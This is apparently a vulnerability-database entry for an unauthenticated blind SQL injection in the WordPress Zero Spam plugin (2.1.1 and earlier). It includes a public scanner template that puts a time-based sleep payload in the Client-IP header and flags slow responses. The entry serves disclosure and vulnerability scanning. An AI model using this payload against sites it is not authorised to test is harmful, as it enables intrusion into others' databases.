zero-spam-sql-injection: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection

日期: 2025-08-01 | 影响软件: WordPress Zero Spam | POC: 已公开

漏洞描述

The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability.

PoC代码[已公开]

id: zero-spam-sql-injection

info:
  name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability.
  remediation: Fixed in version 2.2.0
  reference:
    - https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5
    - https://wordpress.org/plugins/zero-spam/
  metadata:
    verified: true
    max-request: 1
  tags: time-based-sqli,wpscan,wp,wp-plugin,wordpress,zero-spam,sqli,unauth,vuln

http:
  - raw:
      - |
        @timeout: 10s
        GET / HTTP/1.1
        Host: {{Hostname}}
        Client-IP: '+(select(0)from(select(sleep(7)))v)+'

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "zerospam-js")'
        condition: and
# digest: 490a00463044022032f892cb8ac2eece5aef38bad921ffc1456a64c56e86b8d02228e6f7e0dd31e50220631ea8c80c954d8e4c5894b4082661e967c350c855b5cbfe417b3457b3693118:922c64590222798bb761d5b6d8e72950

相关漏洞推荐